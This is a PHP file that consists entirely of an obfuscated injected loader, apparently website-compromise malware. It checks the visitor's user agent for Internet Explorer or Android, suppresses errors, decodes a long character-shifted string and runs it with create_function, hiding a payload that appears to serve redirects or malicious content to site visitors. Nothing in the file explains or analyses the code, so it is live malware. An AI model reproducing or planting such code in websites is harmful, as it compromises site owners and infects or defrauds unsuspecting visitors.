<?php
if((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
    $GLOBALS["anuna"] = 1;
    $uas = strtolower($_SERVER["HTTP_USER_AGENT"]);
    if ((strstr($uas, "msie")) or (strstr($uas, "rv:11")) or (strstr($uas, "android"))) {
        function dechiffre($n) {
            return chr(ord($n) -1);
        }
        @error_reporting(0);
        $niveau2 =
                 implode(array_map("dechiffre", str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!\x246767~6<Cw6<pd%w6Z6<.5`hA\x27pd%6<pd%w6Z6<.4`hA\x27pd%6<pd%w6Z6<.3`hA\x27pd%6<pd%w6Z6<.2`hA\x27pd%6<C\x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf\x27*&7-n%)utjm6<\x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX\x27u%)7fmjix6<C\x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#\x27rfs%6~6<\x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA\x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA\x27K6<\x7fw6*3qj%7>\x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA\x273qj%6<*Y%)fnbozcYufhA\x272qj%6<^#zsfvr#\x5cq%7/7#@#7/7^#iubq#\x5cq%\x27jsv%6<C>^#zsfvr#\x5cq%7**^#zsfvr#\x5cq%)ufttj\x22)gj6<^#Y#\x5cq%\x27Y%6<.msv`ftsbqA7>q%6<\x7fw6*\x7f_*#fubfsdXk5`{66~6<&w6<\x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA\x27&6<.fmjgA\x27doj%6<\x7fw6*\x7f_*#fmjgk4`{6~6<tfs%w6<\x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR\x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR\x27id%6<\x7fw6*\x7f_*#ujojRk3`{666~6<&w6<\x7fw6*CW&)7gj6<.[A\x27&6<\x7fw6*\x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!}\x27;!>>>!}_;gvc%}&;ftmbg}\x7f;!osvufs}w;*\x7f!>>\x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!\x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!\x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!\x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!\x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg\x22)!gj}1~!<2p%\x7f!~!<##!>!2p%Z<^2\x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO\x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f\x27,*e\x27,*d\x27,*c\x27,*b\x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%\x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj\x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc\x7f!|!*uyfu\x27k:!ftmf!}Z;^nbsbq%\x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}\x27;%!<*#}_;#)323ldfid>}&;!osvufs}\x7f;!opjudovg}k~~9{d%:osvufs:~928>>\x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4\x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>\x22!ftmbg)!gj<*#k#)usbut`cpV\x7f\x7f\x7f\x7f<u%V\x27{ftmfV\x7f<*X&Z&S{ftmfV\x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x\x22l:!}V;3q%}U;y]}R;2]},;osvufs}\x27;mnui}&;zepc}A;~!}\x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!\x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_\x5c}X\x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!\x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~\x24<!%o:!>!\x242178}527}88:}334}472\x24<!%ff2!>!bssbz)\x24]25\x24-\x24-!%\x24-\x24*!|!\x24-\x24\x5c%j^\x24-\x24tvctus)%\x24-\x24b!>!%yy)#}#-#\x24-\x24-tusqpt)%z-#:#*\x24-\x24!>!\x24/%tjw/\x24)%\x24-\x24y4\x24-\x24]y8\x24-\x24]26\x24-\x24<%j,,*!|\x24-\x24gvodujpo!\x24-\x24y7\x24-\x24*<!\x24-\x24gps)%j>1<%j=tj{fpg)%\x24-\x24*<!~!\x24/%t2w/\x24)##-!#~<#/%\x24-\x24!>!fyqmpef)#\x24*<!%t::!>!\x24Ypp3)%cB%iN}#-!\x24/%tmw/\x24)%c*W%eN+#Qi\x5c1^W%c!>!%i\x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!\x24/%tmw/\x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr\x5c1^-%r\x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss\x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:\x5c%j:.2^,%b:<!%c:>%s:\x5c%j:^<!%w`\x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~\x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#\x24#-!#]y38#-!%w:**<")));
        $llceolf = create_function("", $niveau2);
        $llceolf();
    }
}
?>